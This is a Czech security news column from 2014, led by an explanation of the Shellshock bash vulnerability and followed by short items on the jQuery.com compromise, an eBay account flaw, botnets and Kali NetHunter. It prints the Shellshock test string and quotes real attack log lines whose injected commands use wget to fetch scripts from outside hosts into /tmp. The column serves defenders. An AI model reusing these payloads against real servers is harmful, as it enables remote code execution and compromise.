Hlavní navigace

Postřehy z bezpečnosti: jste šokováni chybou shellu?

29. 9. 2014
Doba čtení: 4 minuty

Sdílet

V dnešním díle Postřehů se podíváme na kritickou chybu Shellshock, která zkazila víkend většine správců serverů, na napadení serveru jQuery, hack jakéhokoliv účtu eBay do jedné minuty, 12 let trvající útok na tři stovky bankovních systémů, nový projekt od tvůrců Kali Linuxu a mnoho dalšího.

Nová chyba s názvem Shellshock byla nalezena v nejpopulárnějším shellu bash (GNU Bourne Again Shell) a postihuje prakticky všechny linux/unixové operační systémy. Zranitelné jsou systémy používající CGI (Common Gateway Interface), verzovací systém Git, či dokonce DHCP klienti, protože i ti používají bash pro nastavení sítě. Ve zkratce vše, co používá bash, včetně ICS, SCADAa IoT systémů. Podle odhadů je postižených 500 milionů zařízení a chyba je srovnávána s chybou OpenSSL – HeartBleed (skóre 10/10). Chyba existuje již 20 let a zranitelný je bash od verze 1.13 po 4.3.

Chybu (CVE-2014–6271, CVE-2014–7169) objevil Stephane Chazelas z Akamaie, byla oznámena 24. září, ale spekuluje se, že se zranitelnosti využívá již několik týdnů. Je díky ní možné nadefinovat proměnnou s funkcí či skriptem, který se spustí při volání bashe z CGI (mod_cgi), nebo při volání některé z funkcí C, Pythonu, PHP, atd. které bash používají.

Můžete tak například předat serveru funkci (přes URI, nebo jednou z hlaviček), která spustí bash a vypíše “jsem shellsokovan”

env x='() { echo "jsem uvnitr funkce"; }; echo "jsem shellsokovan"'

Nápadům se meze nekladou a když pak projedete logy svého serveru například na string “:;};”, který je zřejmě nejpopulárnější, tak naleznete něco jako:

Sep 26 00:28:07 server tmm2[13972]: 93.103.21.231 - company.co.il - [26/Sep/2014:00:28:07 +0000] "GET / HTTP/1.1" 301 304 "-" "() { :;}; wget 'http://taxiairportpop.com/s.php?s=http%3A%2F%2Fcompany.co.il%2F'" 0.002

Sep 26 00:58:52 server tmm2[13972]: 109.95.210.196 - company.com.pe - [26/Sep/2014:00:58:52 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 332 "-" "() { :;}; /bin/bash -c "/usr/bin/wgethttp://singlesaints.com/firefile/temp?h=company.com.pe -O /tmp/a.pl"" 0.002

[24/Sep/2014:22:50:31 +0200] "GET / HTTP/1.0" 403 209 "() { :; }; ping -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/.../bash-shellshock-scan-of...)"

První verze patche bohužel neopravila chybu úplně, ale v této době již existuje patch, který ji úplně eliminuje.

Existuje několik webových služeb, které vám ověří, zda je váš server napadnutelný, nebo ne, případně si můžete nainstalovat ShockPot, který dokáže detekovat útoky na váš server.

Chybu už využívá například malware Backdoor.Linux.Gafyt, jeden rumunský IRC botnet a je jasné, že ostatní je budou velmi rychle následovat.

Pokud vám stále není něco jasné, zde máte video na YouTube, které vše podrobně popisuje i s ukázkou.

Naše postřehy

Webové stránky populární multiplatformní knihovny jQuery.com byly napadeny a návštěvníci přesměrováni na web hostující RIG exploit kit. Velké štěstí, že ne přímo knihovna, která je linkována na desítkách tisíc webů. 

PayPal nyní akceptuje virtuální měnu bitcoin. Lze za ně sice zatím pořídit pouze nehmotné zboží jako jsou služby nebo hudba, ale i tak se jedná o celkem významný krok. Aby bylo něco takového možné, navázal PayPal spolupráci s bitcoinovými peněženkami BitPay, Coinbase a GoCoin.

Hack jakéhokoliv eBay účtu během jedné minuty? Ano, a tato chyba existovala minimálně čtyři měsíce. Nebylo k tomu potřeba vědět nic víc než uživatelské jméno a výsledkem byla úspěšná změna hesla k účtu.

12 let, to je 4380 dnů (bez přestupních), 262800 hodin! Přesně tak dlouho trval útok pojmenovaný The Harkonnen Operation a přesně tak dlouho měla údajně německá skupina hackerů přístup ke strojům tří stovek bank! Aby při tak rozsáhlém útoku uspěli, registrovali na 800 firem ve velké Británii. Firmy sloužily jako zástěrka při kompromitaci společností v Německu, Švýcarsku a Rakousku. Je jen velmi těžko představitelné, že je něco podobného vůbec možné. Pokud se nejedná o nepravdivé informace, bude se patrně jednat o zatím nejdelší známý útok.

Nový botnet s názvem Spike, jehož hlavním účelem jsou DDoS útoky, je kuriozitou v tom, že jeho síť obsahuje i několik chytrých termostatů, ledniček, Raspberry Pi a dalších IoT zařízení. Nejsilnější známý útok tohoto botnetu měl kadenci 215 Gbps a 150 milionů paketů za vteřinu.

Český článek popisující jednu z EPO technik, konkrétně modifikaci trampolíny funkce ExitProcess. Čtenář se dozví, jakým způsobem malware ukrývá po infekci místo svého spuštění.

Pokud jste majitelem Google Nexus, tak mám pro vás dobrou zprávu. Tým stojící za distribucí pro penetrační testy Kali Linux nyní uvolnil projekt NetHunter. Jedná se o instalační obraz pro mobilní platformu a v této fázi projektu obsahuje celý set užitečných aplikací, které má i distribuce Kali, s tím, že se NetHunter dále specializuje na útoky, ke kterým je potřeba fyzický přístup k zařízením.

Český pohled na aféru FinFisher. Zaměnili nechtěně autoři tabulky názvy Slovenska a Česka? Mohla být zákazníkem soukromá firma místo státu? Pracují pro Gamma International i Slováci a Češi?

Využití pythonu při crackování CAPTCHA loginu jedné reálné banky. Ukázka, že CAPTCHA může být velice zrádná (což už stejně všichni víme).

Zachytili jsme infikovaný PDF dokument. Co ale s ním? Můžeme ho smazat, můžeme ho poslat antivirovým společnostem a nebo si ho zanalyzovat sami. Článek popisuje pět kroků, kterými postupně projdete při analýze.

Defaultní prohlížeč na systémech Android obsahuje závažnou chybu v mechanizmu Same Origin Policy. Doporučuje se přechod na alternativní prohlížeče, jako je Firefox nebo Chrome.

UX DAy - tip 2

Ve zkratce

Pro pobavení

QA Engineer walks into a bar. Orders a beer. Orders 0 beers. Orders 999999999 beers. Orders a lizard. Orders –1 beers. Orders a sfdeljkn.

Závěr

Tento seriál vychází střídavě za pomoci konzultantů firmy Datasys a redaktorů serveru Security-Portal.cz. Uvítali bychom i vaši spolupráci na tvorbě obsahu tohoto seriálu. Pokud byste nás chtěli upozornit na zajímavý článek, tak nám napište na FB stránku, případně na Twitter. Děkujeme.

Byl pro vás článek přínosný?